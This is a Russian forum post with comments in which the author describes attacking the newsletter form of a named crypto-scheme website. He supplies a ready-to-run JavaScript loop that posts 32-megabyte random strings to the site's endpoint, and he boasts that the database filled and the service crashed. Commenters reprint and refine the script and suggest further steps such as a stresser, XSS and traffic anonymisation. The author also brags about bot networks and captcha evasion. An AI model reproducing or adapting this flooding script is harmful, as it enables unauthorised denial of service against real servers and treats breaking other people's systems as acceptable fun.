7244

Шлём `Привет` кэшбери

Вижу пост

Не долго парясь нахожу в интернете их сайт http://gdc.group


Ооокей... Смотрим что там и как. И оказывается что фильтр почты, которую к ним на рассылку можно закинуть - фиктивный. Те если отправить руками то можно записать что угодно.


http://gdc.group/files/action/ajax.php?email=1


Методом перебора узнаём что под поле почты выделено 32милиионов(2^25) символов строка... А это 32 мегабайта.


Пишем небольшой скрипт


i=0; spam = () => { $.post('http://gdc.group/files/action/ajax.php', { email: Array(2**25).fill().map(()=>{ return String.fromCodePoint(~~(Math.random(1, 255) * 255)) }).join('') }, (a)=>{console.log(++i, a); spam();}); }; spam();

Хотя на деле лучше степень 20 гдето, потому как на лимите там памяти не хватает.


Ну и итого всё..) Память у сервиса кончилась, удачи разрабам разгребать говно и фиксить дыры..)

Как минимум гигов на 10 в базу я поднасрать успел, пока память не закончилась... Если ребутнут не пофиксив, продолжим...


Такие успешные парни, а найти разраба не из студентов не смогли =\


Теперь всегда так:

Fatal error: Allowed memory size of 268435456 bytes exhausted (tried to allocate 4304128 bytes) in /home/bitrix/ext_www/gdc.group/files/action/ajax.php on line 8

Ещё и битрикс... Фи...

459
Автор поста оценил этот комментарий

Так то да, но главное чтобы потом не притянули ТСу пару статей.


Статья 273. Создание, использование и распространение вредоносных программ для ЭВМ.

...наказываются лишением свободы на срок до трех лет со штрафом в размере до двухсот тысяч рублей или в размере заработной платы или иного дохода осужденного за период до восемнадцати месяцев.

Статья 274. Нарушение правил эксплуатации ЭВМ, системы ЭВМ или их сети.

...наказывается лишением права занимать определенные должности или заниматься определенной деятельностью на срок до пяти лет, либо обязательными работами на срок от ста восьмидесяти до двухсот сорока часов, либо ограничением свободы на срок до двух лет.
раскрыть ветку (1)
916
Автор поста оценил этот комментарий

Вот поэтому развлекаться подобным стоит только с ребятами типа Кэшбери... За кэшбери разве что медаль наоборот дадут)

показать ответы
11
Автор поста оценил этот комментарий
Злодей!
раскрыть ветку (1)
79
Автор поста оценил этот комментарий

Хм... Вы думаете что это я злодей?)

показать ответы
21
Автор поста оценил этот комментарий

Как минимум несколько часов к ним никто на рассылку не подписывался. (они как-раз эту свою крипту активно рекламят).

А это одностраничник и там единственный вариант получить фидбек - оставить почту. Т.е. на рекламу потратились, человек пришел, увидел ошибку и свалил. Они потеряли лоха, лох не потерял свои деньги.

раскрыть ветку (1)
30
Автор поста оценил этот комментарий

Примерно в этом и состояла моя гражданская позиция..)

26
Автор поста оценил этот комментарий

Плюс. Автор, можно русскими словами, что ты сделал и что из-за этого у них не будет работать, написано как на эльфиском)

раскрыть ветку (1)
108
Автор поста оценил этот комментарий

В поле email отправлял случайно заполненную строку на 32 миллиона символов которую они записывали в базу. Но из-за неоптимального кода и утечек памяти больше нельзя подписаться на их рассылку. У них лёг этот сервис.

показать ответы
83
Автор поста оценил этот комментарий

Кто подаст- то? Организация зарегистрированная в офшорах чтоли? Да и на кого? Ты сначала ТСа идентифицируй и найди, а уж потом подавай :)

раскрыть ветку (1)
100
Автор поста оценил этот комментарий

Бля, на самом деле это не трудно, но на деле касательно этого никто париться не будет, да и ущерба я не нанёс особо, а если что серьезнее пойдет, там я уже рассказывать не буду, да и хрен кто докажет)

показать ответы
7
Автор поста оценил этот комментарий

круто. хочу быть таким как ты)

раскрыть ветку (1)
58
Автор поста оценил этот комментарий

Поверьте, человек который сидит в апатии и депрессии, да занимается всякой хренью которая как ему кажется может дать немного навыков и развлечь, не лучший пример для подражания =\

показать ответы
47
Автор поста оценил этот комментарий

Не дадут. Лучше не оставлять следов.

раскрыть ветку (1)
53
Автор поста оценил этот комментарий

Ну вопрос масштабности дела. Если бы удалось сделать инъекцию - фиг бы я об этом рассказывал))

показать ответы
114
DELETED
Автор поста оценил этот комментарий
32 мегабайта под поле email? Это сильно.
раскрыть ветку (1)
97
Автор поста оценил этот комментарий

Это битрикс. Этим всё сказано. Но юзать лонг текст это сильно.

Суть в том что пока не лёг сервис там возвращало то что да - записало, либо: нет - уже записано.

И было протестировано на записанной 2**25 строке что она реально записывается, по ней смогли найти в базе мою запись дабы не было дубля..)

показать ответы
3
DELETED
Автор поста оценил этот комментарий

Хреново так жить, по себе знаю :)

раскрыть ветку (1)
24
Автор поста оценил этот комментарий

Я вот уже 2 недели не могу выйти из депресухи, вообще ничего не радует... Вот минутная радость, потому что кто-то ещё больший дебил чем я... 2^25 под email... Ммм сильна)

показать ответы
8
DELETED
Автор поста оценил этот комментарий

А что такое быстрый и битрикс, но не сайт?

раскрыть ветку (1)
24
Автор поста оценил этот комментарий

Можно на хард залить битрикс и кинуть с балкона) Быстро полетит..)

показать ответы
Автор поста оценил этот комментарий
Только зачем? Те, кто заносят туда деньги будут против. А те кто не заносит - им по барабану.
раскрыть ветку (1)
12
Автор поста оценил этот комментарий

Потому что это весело!

показать ответы
Автор поста оценил этот комментарий
И?
раскрыть ветку (1)
40
Автор поста оценил этот комментарий

Это весело..) Плюс таким образом я выражаю свою гражданскую позицию.

Ну и в принципе интересно может кому будет.

показать ответы
41
Автор поста оценил этот комментарий
спешу расстроить, он просто обратился к базе данных сайта, не попадает под статью)
раскрыть ветку (1)
22
Автор поста оценил этот комментарий

Ну не совсем, если очень захотеть там можно раздуть, но это жесть как захотеть надо.

24
Автор поста оценил этот комментарий

Да, Серёг, ты бы это, чуть поанонимнее ники придумывай) Велосипеды и путешествия это конечно хорошо, но надо немного больше фантазии )))

раскрыть ветку (1)
27
Автор поста оценил этот комментарий

Анонимнее ник - это когда мне нужна анонимность. Тут мне не нужна анонимность.

показать ответы
8
Автор поста оценил этот комментарий

Я понял, что ТС опасный парень!

раскрыть ветку (1)
19
Автор поста оценил этот комментарий

Ага, чувак который всё делает на JS опасен :D

показать ответы
18
Автор поста оценил этот комментарий
Вам выборов в Америке не хватило?!
Иллюстрация к комментарию
раскрыть ветку (1)
26
Автор поста оценил этот комментарий

Хыхы) Не поверишь, работал в конторе, которая на них влияла..)

показать ответы
Автор поста оценил этот комментарий

Еще как попадает. Т.к. запросы идут через написанный им скрипт, и нарушается работоспособность сайта.

раскрыть ветку (1)
26
Автор поста оценил этот комментарий

Мы сейчас тогда нарушаем работу пикабу, пользуясь ресурсом пикабу, что забивает ему базу)

показать ответы
27
DELETED
Автор поста оценил этот комментарий
Так вот как расшифровывается ТС
раскрыть ветку (1)
51
Автор поста оценил этот комментарий

Бля, если б вы это не написали, я бы был дальше в неведении))

показать ответы
3
DELETED
Автор поста оценил этот комментарий

Я смотрю, вы шарите! Скажите что нибудь по битрикс-php-программистски.

раскрыть ветку (1)
9
Автор поста оценил этот комментарий

Нам надо на сервер ещё памяти!))

Автор поста оценил этот комментарий

Следуя вашей логике, хакеры тоже просто "обращаются к http серверу", взламывая сайты. Хакер, вставляющий кавычку в поле логина и получивший доступ к БД через инъекцию, никогда не будет квалифицирован как "он ошибся, просто не то отправлял", а будет всегда квалифицирован как взлом.


Да, дырка есть, каждый может ей воспользоваться, но софт, эксплуатирующий дыру - это и есть "вредоносная программа". Вы вывели сайт, навредили, и думаете, что вам ничего не будет?)


Слава богу, мир устроен не так, и даже в цифровом пространстве закон главнее файрволов. Если вы нашли дырку в софте, это не значит, что можете ею пользоваться.


Удачи, юный хакер :)

раскрыть ветку (1)
17
Автор поста оценил этот комментарий

Я уже совсем не юный хаккер. Просто это не хаккерство.

Я должен или навредить данным или получить к ним доступ.

Я серьезно, не успел ничего сделать толком)) Там утечка памяти.


Просто написано так херово, что всё сломалось )

показать ответы
41
Автор поста оценил этот комментарий

Если интересно кому на каком шаблоне они запилили фронт-енд сайта, то вот ссылка: http://marveltheme.com/tf/html/crypcash/crypcash/ (на сколько я понял - он 15 доллларов стоит, но так как он html + css + js + картинки, можно вытянуть вручную). Не рекламы ради, общее дело за.

раскрыть ветку (1)
17
Автор поста оценил этот комментарий

О, интересно. Пользоватья не буду конешн, но просто интересно))

3
Автор поста оценил этот комментарий
@ser60v, это правда?
раскрыть ветку (1)
29
Автор поста оценил этот комментарий

У меня есть сайт. Который, о хоспади ищется по нику моему ) Там есть все мои контакты)

Более того я хожу регулярно на тренировки в одни и теже места..)

показать ответы
DELETED
Автор поста оценил этот комментарий

Фи так писать

i=0; spam = () => { $.post('http://gdc.group/files/action/ajax.php', { email: Array(2**25).fill().map(()=>{ return String.fromCodePoint(~~(Math.random(1, 255) * 255)) }).join('') }, (a)=>{console.log(++i, a); spam();}); }; spam();
раскрыть ветку (1)
8
Автор поста оценил этот комментарий

Как бы написали Вы, если цель не париться, а в консольку кинуть и поразвлекаться?.

Так то js - явно не лучший вариант подобное делать. Но если речь про js - как бы вы поступили?)

Охотно принимаю критику)

показать ответы
Автор поста оценил этот комментарий

На вкус и цвет. Я бы не взялся, это вопрос профессиональной этики, на мой взгляд.

раскрыть ветку (1)
8
Автор поста оценил этот комментарий

Не взялся за что?) За одностраничник?) Ну да, я тоже не взялся бы) Но это образно )

На деле - вопрос в цене.

3
Автор поста оценил этот комментарий

Автор написал вредоносную программу на js, код которой приложил в посте, ее использование привело к нарушению работы сайта, под статью должно попадать. Легкая палка для наших доблестных полиционеров, осторожнее надо быть.

раскрыть ветку (1)
27
Автор поста оценил этот комментарий

Посмотрел по терминам - не попадает под вредоносные программы )

По сути она лишь занималась обращением к их сервису... И опачки я ошибся и отправлялось не то, но мне же фид бека не было что о шибся..)

показать ответы
36
Автор поста оценил этот комментарий
Такие успешные парни, а найти разраба не из студентов не смогли =\

Нормальным разработчикам западло с таким иметь дело.

раскрыть ветку (1)
45
Автор поста оценил этот комментарий

Как бы тебе сказать... Вопрос в деньгах, это рас. У меня бы заказали, не говоря кто это - сделал бы сносно бэк енд, а дальше тексты только подправить и ок)

показать ответы
0
Автор поста оценил этот комментарий

ТС, тот кто верит в кэшбери дебиллы. Да заминусят) это русский народ. Не будет кэшбери, они в другое понесут свои деньги, влезут в кредиты, а оптом будут орать, приставы из квартиры выгоняют.

раскрыть ветку (1)
14
Автор поста оценил этот комментарий

Понимаете, уважаемый, я просто вандал, эдакий. Но я не люблю писать на заборе мимо которого сам хожу. Мой вандализм-кибервандализм.

Сломать то что я не уважаю. Сломать что-то друзьям и объяснить как, дабы поправили и им не пришлось ломать голову когда это сделают реально злоумышленники.

Кто-то играет в игры, кто-то читает книги, кто-то жрёт водку, а кто-то ищет дыры в сайтах потому что ему скучно и грустно.

показать ответы
24
Автор поста оценил этот комментарий
Нихера в этом не понимаю ,но мне почему то тоже весело)))
раскрыть ветку (1)
14
Автор поста оценил этот комментарий

Мне казалось я понятным языком расписал..)

Суть в том что интересно искать дыры и использовать в сервисах которые ведут себя не по людски. В даном случае у них всё просто - можно записать почту, но нет здравого лимита по символам в поле. Там лимит 32 миллиона символов. Что будет 32 мегабайта примерно. Ну и мы начинаем записывать туда случайную строку зациклив это дело.

показать ответы
5
Автор поста оценил этот комментарий

а что значит spam spam spam в коде?

раскрыть ветку (1)
7
Автор поста оценил этот комментарий

Название функции, которую яобъявляю и использую в коде.

показать ответы
7
Автор поста оценил этот комментарий

Тс, сабж, флуд, оффтоп, флейм, ник, тред, приват, пм, модер, бан, холивар, чат, тролль, кэп... Вам, ребят, только недавно интернет завезли, что ли?)

раскрыть ветку (1)
7
Автор поста оценил этот комментарий

Ей богй - ТС знаю значение, но не знал расшифровки )

показать ответы
0
Автор поста оценил этот комментарий

у меня не работает

раскрыть ветку (1)
7
Автор поста оценил этот комментарий

Ну не должен... Я уже скрипт написал который меня оповестит если поднимут...

Автор мб думал что сайт должен не работать. Но сайт на апаче какомнить и там память на него ещё есть... Увы, я всего один сервис поломал и то до того как не ребутнут сервер.

показать ответы
Автор поста оценил этот комментарий

И?

раскрыть ветку (1)
7
Автор поста оценил этот комментарий

Юный октябрь впередии!!!

показать ответы
Автор поста оценил этот комментарий
И?
раскрыть ветку (1)
7
Автор поста оценил этот комментарий

Ну и до кучи - так издеваться над своим сервером плохо, а интересно как будет что себя вести..)

32
Автор поста оценил этот комментарий

Я решил проверить насколько не сложно.

Ты меня просто поразил, гугл разве что ключи от квартиры мне не выдал.

раскрыть ветку (1)
18
Автор поста оценил этот комментарий

Лично меня найти достаточно легко..)

показать ответы
75
DELETED
Автор поста оценил этот комментарий

какие расы предпочитаете? эльфов? орков?

раскрыть ветку (1)
27
Автор поста оценил этот комментарий

Уффф)) Долго не мог понять в чём прикол..) Мой косяк, спасибо что обратили внимание))

показать ответы
0
Автор поста оценил этот комментарий

ох чел лучше бы ты не писал этот пост, а тихонько радовался

раскрыть ветку (1)
12
Автор поста оценил этот комментарий

Да чему радоваться то?) Так то - фиксится это легко. Ущерба я особо не нанёс, но это весело..)

показать ответы
13
Автор поста оценил этот комментарий

Любые данные в типичную БД вносятся командой вроде ADD ‘Вася’ TO TABLE ‘Алкоголики’ IN DATABASE ‘Бухаем’ (синтаксис совсем фиктивный, есличо): в одной строке передаются и команды, и данные. Если пользователь достаточно хитрожопый,  он может попытаться передать с запросом такие данные, которые БД сочтёт частью команды. Хозяин этой машины попытался таким образом передать команду «удалить базу данных», рассчитывая, что в польском ГИБДД IT-отдел состоит из полных идиотов.

раскрыть ветку (1)
6
Автор поста оценил этот комментарий

Нет, это если разработчик достаточно дебил и не делал экранирования.

показать ответы
12
Автор поста оценил этот комментарий
У человека почта длинная. Имеет право
раскрыть ветку (1)
6
Автор поста оценил этот комментарий

256 символов максимум..)

7
DELETED
Автор поста оценил этот комментарий

Это всё конечно хорошо, но надо бы добавить правду в описание. Смысл данных действий только хулиганство. Думаю, что стоит достать бубен и воззвать к XSS. (адрес авторизации админки не нашли?).

раскрыть ветку (1)
6
Автор поста оценил этот комментарий

не искал даже, я хотел зарегаться и чёт поковырять а вышло как вышло..)

показать ответы
DELETED
Автор поста оценил этот комментарий

А в чём казино наебалово? Обычные азартные игры. Спортлото же не наебалово.

Или там предполагался скрипт, который специально не даёт выиграть?

раскрыть ветку (1)
6
Автор поста оценил этот комментарий

Казино наебалово тогда, когда они не проходят проверки итп )

А в онлайне большиство такие. Там я могу подкрутить как угодно.

Автор поста оценил этот комментарий

И?

раскрыть ветку (1)
6
Автор поста оценил этот комментарий

Бля, я не успел)

15
Автор поста оценил этот комментарий

Класс. И правда форма связи прилегла. Сунуть бы еще ip в стрессер, чтобы прилег.

раскрыть ветку (1)
11
Автор поста оценил этот комментарий

Меня интересует то что решается оптимизацией и малыми затратами. Тут явный косяк, в принципе можно расценивать как то что я на это обратил внимание админов сайта.

Ну и на то что они не написали тестов...

показать ответы
Автор поста оценил этот комментарий
Блин, если бы видно было реакцию их, или реально бы тормознуло их - да, весело. А подпрыгивать на кресле и фантазировать, что сильно им нагадил- сродни ананизму
раскрыть ветку (1)
15
Автор поста оценил этот комментарий

Дык ещё не вечер..) Поищу ещё дыры в сервисах. Видно что делали профаны.

показать ответы
2
Автор поста оценил этот комментарий

почти у каждого сайта такая "дыра", почти  все в поле фидбека не ставят ограничений на количество символов

раскрыть ветку (1)
10
Автор поста оценил этот комментарий

Ну блин, по возможности не будьте дебилами, если что-то делаете....

25
Автор поста оценил этот комментарий

Дело в том, что представители многих других профессий сидят в такой же апатии и такой же депрессии, при этом занимаются большей хренью за меньшие деньги.

раскрыть ветку (1)
5
Автор поста оценил этот комментарий

На деле вопрос желания и интересов... Я вот в этом году впервые занялся олимпиадным программированием. Те кто так же займутся в этом же году имеют почти те же шансы)

Вопрос интересов)

показать ответы
31
Автор поста оценил этот комментарий

Товарищ майор, успели записать?

Иллюстрация к комментарию
раскрыть ветку (1)
11
Автор поста оценил этот комментарий

Конкретно меня найти если есть мой ник с пикабу не сложно. Вопрос в том, что я не считаю что я что либо нарушил на столько что мне что либо будет. Если я ошибся, то увы )

показать ответы
DELETED
Автор поста оценил этот комментарий

Хотя бы прописал области видимости (function вместо () => {}). Массив врятли задавал бы при помощи fill.map можно использовать while/for быстрее, синхронно, явно. Ну и классические Math.pow вместо ** и Math.floor вместо ~~

А в целом ничего такого. Просто я бы не хотел с вами работать XD

раскрыть ветку (1)
8
Автор поста оценил этот комментарий

Ну вот тут я пожалуй против.

while/for не быстрее, не явнее, менее читабельно

Math.pow вместо ** и Math.floor вместо ~~

Принципиально их не использую потому как больше символов и их дольше писать. Смысл?

function зачем тут прописывать, да и где либо чай не 2007 год es6? Видимость? Видимость чего вас тут не устраивает?..

Реально предложите код получше, ведь его модифицировать 1 минуту.

показать ответы
0
Автор поста оценил этот комментарий

Так, а разве в субд не стоит по-умолчанию запрет на дроп всей таблицы? Я, как любитель, уточняю

раскрыть ветку (1)
4
Автор поста оценил этот комментарий

Нет конечно. А как ты её удалишь если понадобится?) Просто нормальные люди делают пользователя который должен допустим только добавлять и редактировать с правами на insert+update

11
Автор поста оценил этот комментарий

Некотрапы в ASCII

раскрыть ветку (1)
4
Автор поста оценил этот комментарий

Понимаешь, когда это будут затирать - будут затирать либо всё что пришло с моих проксей, либо всё что длиннее 64 символов например ) Никто их не успеет рассмотреть кроме меня... А я не хочу)

Автор поста оценил этот комментарий

Откуда вы взяли про "навредить данным"?

272 УК вам в помощь: "Неправомерный доступ к охраняемой законом компьютерной информации, если это деяние повлекло уничтожение, блокирование, ..."

Вы заблокировали доступ к информации.

раскрыть ветку (1)
13
Автор поста оценил этот комментарий

Так суть в том что это деяние не повлекло к уничтожению, блокированию и чему либо ещё)

показать ответы
1
Автор поста оценил этот комментарий
@ser60v, Сергей как я понимаю?! Подскажите, ударила моча в голову тут и подумал я, а не попробовать ли мне программировать. С чего начать ? Вроде как советуют Яву, явускрипт или питон. С чего начать? Не для себя конечно, для монитизации этих будущих умений.
раскрыть ветку (1)
3
Автор поста оценил этот комментарий

Вопрос в томчто штырит...

Если ява скрипт, то это node

Питон повыше порог вхождения.

/beardeddwarf

в контач стукни могу пару советов дать, да книг, задач покидать.

0
DELETED
Автор поста оценил этот комментарий
Комментарий удален. Причина: данный аккаунт был удалён
раскрыть ветку (1)
3
Автор поста оценил этот комментарий

Фильтры всякие нужны, фильтры всякие важны ) Но тут самая главная ошибка то что блять лонг текст под поле email!!!

показать ответы
1
Автор поста оценил этот комментарий

У вас странные вкусы.

Все перечисленное вполне идиоматичный js.

раскрыть ветку (1)
3
Автор поста оценил этот комментарий

Ну вот правда я что-то не понял..) То что не использовал reduce возможно зря. Но что написал с первой попытки - то написал ) Там 1 строчка какбы создания строки..)

А вот ~~ заместо Math.floor (учитывая что я писал в консоли)

Да ** заместо Math.pow

Считаю что это удобнее.


Функции давно объявляют так как я объявил и я из тех кто считает что так удобнее...

Так что сомнительные претензии...

Автор поста оценил этот комментарий
Верни все как было! Мне денег обещали! )

А теперь по делу - ТС, а ты сможешь спамеров почтовых вычислять и "вешать" их? Задрали в доску, все капчи обходят индусы проклятые.
раскрыть ветку (1)
3
Автор поста оценил этот комментарий

Вы не совсем по адресу ) Вычисляют толковые там админы, подобных.

Я как раз в полчище тех спамеров, которые любую капчу могут обойти..)

Я как раз специализируюсь на ботах, ботсетях итп.

показать ответы
Автор поста оценил этот комментарий

ну... ddos тоже обращение... но уже квалифицируется )

раскрыть ветку (1)
7
Автор поста оценил этот комментарий

Ддос несёт цель и ресурсы.

показать ответы
2
Автор поста оценил этот комментарий
При открытии меню чуть-чуть верстка съезжает, влом чинить или не знал?
Иллюстрация к комментарию
Иллюстрация к комментарию
раскрыть ветку (1)
5
Автор поста оценил этот комментарий

Знаю ) Уже год лень поправить))

На коленке сайт был состряпан перед выездом. Давно пора с нуля сайт пересобрать, но так леееень...

Автор поста оценил этот комментарий

в зал ходить не обязательно. заказать велотренажер с доставкой, чтобы на месте собрали\проверили. можно даже одеться в теплые шмотки, чтобы пропотеть хорошо, потом душ, ужин, темную повязку на глаза \шторы и спать

раскрыть ветку (1)
2
Автор поста оценил этот комментарий

Да штанга есть, велосипед есть.

Поймите, ни в чём не вижу смысла. Просто испытываю стресс по поводу того как я всё вокруг проябываю)

показать ответы
0
Автор поста оценил этот комментарий

В исходнике странички(в браузере пункт показать исходный код) фигурирует /bitrix/templates/.default/

Про битрикс=говно спорить смысла не вижу. Я регулярно слышу "bitrix говно", "php говно", "динамические языки говно", "программисты говно"


я просто указал, что некорректно сравнивать студенческое подделие и коммерческую CMS, в которой точно не может быть выделено под поле email 32 мегабайта.

раскрыть ветку (1)
2
Автор поста оценил этот комментарий

Ну дык не факт что это студенческое поделие )

Состоявшиеся люди работающие по специальности тоже бывают кретинами)

0
Автор поста оценил этот комментарий

много физо, до изнеможения на все группы мышц и нормальное питание.

за 2-3 дня мозги прочистит.

велотренажер, штангу небольшую

раскрыть ветку (1)
2
Автор поста оценил этот комментарий

Ребят, ну не работает это так. Нужна какая-то встряска. Я даже рад бы был чтобы меня бомж отпиздил, дабы вылезти из этого состояния )

Я просто не могу выйти из дома потому как в голове убеждение что я буду напрягать людей. Не могу пойти на тренировку, потому как в голове засела мысль что я там не нужен и я там мешаю.Что с этим делать я не знаю.

показать ответы
Автор поста оценил этот комментарий
Да где ж тут вредоносные программы. Обычный dos
раскрыть ветку (1)
2
Автор поста оценил этот комментарий

Во первых ddos и dos - это разные вещи.

Во вторых это не ddos.

показать ответы
0
Автор поста оценил этот комментарий
Он забил оперативную память запросами, поэтому сервак упал. Я в матчасти не силён, но, либо пока сервак не очистит память, либо пока руками не очистят - так и будет лежать
раскрыть ветку (1)
2
Автор поста оценил этот комментарий

Нет, не было цели забить ) Там просто утечка памяти, память закончилась, интерпритатору php не хватает оперативы для минимальных действий.

Не надо быть такими как те разрабы и так херово писать код =\

показать ответы
0
Автор поста оценил этот комментарий

Ну, в том, что это и у тебя неслабо тормозило :)

раскрыть ветку (1)
2
Автор поста оценил этот комментарий

Ммм... Ну смотри - ждать пока зальётся - секунд 5. Запрос формируется бустрее десятой секунды. Даже если мы оптимизируем в 0 и то - не ясно сколько там милисек ) То мы выиграем в лучшем случае 1% к произвдительности..) А у них будет разнообразный мусор ) Я же хороший человек, я хочу в базу залить разнообразного говна)

0
Автор поста оценил этот комментарий
это случаем не через минимизатор прошло?))
раскрыть ветку (1)
2
Автор поста оценил этот комментарий

Пфф... Я тут по минимизаторству в соревнах участвовал, вот там такая нечитабельная дичь выходит..)

Это как по мне - просто и читабельно как раз...

Сейчас я бы только вот так вот написал бы

i=0;
spam = () => $.post(
       'http://gdc.group/files/action/ajax.php',
       { email:
            Array(2**25).fill().map(()=>{ return String.fromCodePoint(~~(Math.random(1, 255) * 255)) }).join('')
},
     (a) => {
         console.log(++i, a);
         spam();
     });
spam();
показать ответы
2
Автор поста оценил этот комментарий

у меня нет

раскрыть ветку (1)
2
Автор поста оценил этот комментарий

Ну вот я с разных ip попробовал - голяк до сих пор.

показать ответы
7
Автор поста оценил этот комментарий

с чего битрикс, позвольте спросить?

раскрыть ветку (1)
7
Автор поста оценил этот комментарий

http://gdc.group/files/action/ajax.php?email=1

пройдите по ссылке и  почитайте ) Мб это только название)

Но слово битрикс меня напрягло ) Как минимум эти парни пользовались битриксом)

показать ответы
1
DELETED
Автор поста оценил этот комментарий

ага, это самопил. Но bitrix-env стоит. http://gdc.group/.htaccess

раскрыть ветку (1)
2
Автор поста оценил этот комментарий

Да говорю, речь в том что там где-то битрикс замешан) Но где именно я не понял, да и понимать лень...

показать ответы
0
DELETED
Автор поста оценил этот комментарий
А это просто мем? Или это реально сработало?
раскрыть ветку (1)
1
Автор поста оценил этот комментарий
Просто чел пробовал. Не сработало.
0
Автор поста оценил этот комментарий

Так-то да, но почему бы и не писать под них дальше? У меня на джумле есть куча наработок, которые можно монетизировать(нет, потому что я ленивый хуй).

раскрыть ветку (1)
1
Автор поста оценил этот комментарий

А не хочется заниматься чем то более высокооплачиваемым и интересным?.. Это как - я умею вычёрпывать говно из ямы, у меня даже ведро есть. Почему бы не продолжать этим заниматься?)

Умеешь - ладно, делать нечего, подвернулась шабаха - окей, вспомнил юность. Но ведь куча курсов есть, куча более интересных направлений...

показать ответы
0
Автор поста оценил этот комментарий

Ну не скажи. По работе приходится писать под джумлу и я могу с уверенностью сказать что мне нравится. Вполне себе неплохая CMS для напильника. Есть еще вордпресс, вот там код - адовые дебри, но для того чтоб без кодяры что-нибудь сделать, подходит идеально. Магенту не знаю, а в модх лезть больше не хочу, как, в принципе и в вп.

раскрыть ветку (1)
1
Автор поста оценил этот комментарий

Просто забей на все cms хрен и пиши чёт нормальное )

Рекомендую )

показать ответы
0
Автор поста оценил этот комментарий
ТС, ты в каком городе?
раскрыть ветку (1)
1
Автор поста оценил этот комментарий

А зачем?..)

0
Автор поста оценил этот комментарий

Характеристики операционки, видюха, проц, еще много чего - браузеры отдают очень дофига информации.

раскрыть ветку (1)
1
Автор поста оценил этот комментарий

Эти все данные можно отправлять и левые/случайные..)

Потом - пуща у меня на никсах браузер узнает что у меня за видяха..)

показать ответы
0
Автор поста оценил этот комментарий

Мы что то в другую степь поехали. Я в курсе, что получение внешнего IP это не функция браузера. Я лишь заметил, что некоторые браузеры позволяют его выводить без использования стороннего софта или команд.

раскрыть ветку (1)
1
Автор поста оценил этот комментарий

Так отправить то как?) Я лишь сказал что браузер не отправляет эту инфу)

0
Автор поста оценил этот комментарий

Поможем скрыться от преследования, затереть все данные преступления и начать новую жизнь в Канаде, попивая кленовый сироп и потрахивая бобров.

Обращайтесь 8-800-555-35-35

раскрыть ветку (1)
1
Автор поста оценил этот комментарий

Я в деле!

0
Автор поста оценил этот комментарий

А скрипт этот написан на каком языке?

раскрыть ветку (1)
1
Автор поста оценил этот комментарий

См теги

0
Автор поста оценил этот комментарий

вы когда нибудь лог любого http сервера видели? там есть поле client IP

раскрыть ветку (1)
1
Автор поста оценил этот комментарий

Твою ж родину. Это передаёт не браузер. Это лог соединения. Откуда пришло.

Если использовать прокси - будет другой ip

Например у меня сейчас 3 ip 192.168.0.102 127.0.0.1 и ещё один.

У некоторых провайдеров вообще 1 ip на всех.


И мой комп не знает моего ip я его узнать могу как раз с помощью какого либо сервиса на который бы я обратился чтоб он узнал моё имя.


Точнее узнать адрес свой только в локальной сети можно, но он то никому не интересен.

показать ответы
2
Автор поста оценил этот комментарий

ага, только вот во время сессии любой веб сервер конечно записывает в лог ип адрес клиента и его запрос. Так что все ок :)

раскрыть ветку (1)
1
Автор поста оценил этот комментарий

ip чего он записывает?

показать ответы
Автор поста оценил этот комментарий

Все очень просто. Если все правда уверены что Кешберри это просто контора, которая обирает лохов, и у них нет влиятельной крыши, то ошибаетесь. Просто так левым людям никто не дал бы заработать пару миллиардов, за крупной пирамидой(а также за всем тем, где большие деньги) всегда стоят очень влиятельные люди.. а дальше скорее всего развитие событий такое:
ТС сам признался что это сделал он и как сделал. а также дал намек как его найти(ну при желании его нашли бы и без этого) #comment_127125540
В полицию конечно же никто подавать не будет. Но есть очень большая вероятность что к ТС приедут серьезные дяди и поставят на счетчик. Либо сломают пальцы, чтобы больше неповадно было. Есть правда еще вариант, что возьмут на работу, и это и есть коварный замысел ТС:)))
Как говорится сделал добро, лучше молчи в тряпочку. ТС же решил козырнуть тем какой он крутой, а заодно и показать на одном из самых посещаемых ресурсов рунета, дыру сайта Кешберри. а по идее мог бы развлекаться еще пару дней, так то ты им фактически сообщил что закрывать надо.


Кстати сайт уже подняли
раскрыть ветку (1)
1
Автор поста оценил этот комментарий

Это правится за 5 минут работы из которых 4 минуты ты пьёшь кофе и смотришь как перезагружается сервер..) Не более.

Если бы эта страница кому-то нужна была - уже поправили бы.

показать ответы
1
Автор поста оценил этот комментарий

Чувак, я не кэшбери, но я хочу с тобой дружить. Как тебя найти?

раскрыть ветку (1)
1
Автор поста оценил этот комментарий

По нику есть сайт. Там контакты.

показать ответы
8
DELETED
Автор поста оценил этот комментарий

понял, ладно сейчас досмотрим "высадку на марс"  начнем ковырять *бл*дк*в, Не забывайте заворачивать трафик через темные места. Рекомендую nipe (https://github.com/GouveaHeitor/nipe).

раскрыть ветку (1)
1
Автор поста оценил этот комментарий

Суууука, я про неё забыл!!!

показать ответы
0
Автор поста оценил этот комментарий
А ты крут. Я вот и не знал о подобных уязвимостях. То есть на любой форме обратной связи, которая хранится в базе можно провернуть нечто подобное?
раскрыть ветку (1)
1
Автор поста оценил этот комментарий

Нет. Далеко не в каждой. И повторюсь - их главная ошибка - такой безумный лимит на поле email. Было бы там 256 символов, то хрен бы там что произошло...

Вот и всё. Много различных уязвимостей существует, на которые люди забивают зачастую. Самое клёвое - это sql -инъекции

показать ответы
Автор поста оценил этот комментарий
Уже работает
раскрыть ветку (1)
1
Автор поста оценил этот комментарий

http://gdc.group/files/action/ajax.php?email=2

сюда зайдите, когда будет нормально - работает.

Положен не сайт, а лёг скрипт из-за утечки памяти.

2
Автор поста оценил этот комментарий

Join вообще криво, это over9000 конструкторов технически. Prealloc надо.

раскрыть ветку (1)
1
Автор поста оценил этот комментарий

С преаллок подскажите?..

У меня мысль разве что так вот

Array(5).fill().reduce((a)=>a+String.fromCodePoint(~~(Math.random(1, 255) * 255)), '')
показать ответы
0
Автор поста оценил этот комментарий

Подняли обратно уже

раскрыть ветку (1)
1
Автор поста оценил этот комментарий

Ммм... У вас всё работает?

показать ответы
11
Автор поста оценил этот комментарий
Как минимум гигов на 10 в базу я поднасрать успел, пока память не закончилась

Хороший тактический ход, в следующий раз надо залить им кототрапов.

Иллюстрация к комментарию
раскрыть ветку (1)
1
Автор поста оценил этот комментарий

Увы, там текстовые строки )

показать ответы
0
Автор поста оценил этот комментарий
Виртуалки выход конечно, но чтобы это сделать нужна жёсткая паранноя. Видяха и проц генерят через скрипт во вкладке браузера. Вот статья по теме https://m.habr.com/ru/company/oleg-bunin/blog/321294/
обладая желанием и ресурсами, вычислить вопрос времени. Если паранноя не уровне болезни, то рано или поздно спалишься. Виртуалки без палива сделать тоже хлопотно...
раскрыть ветку (1)
0
Автор поста оценил этот комментарий

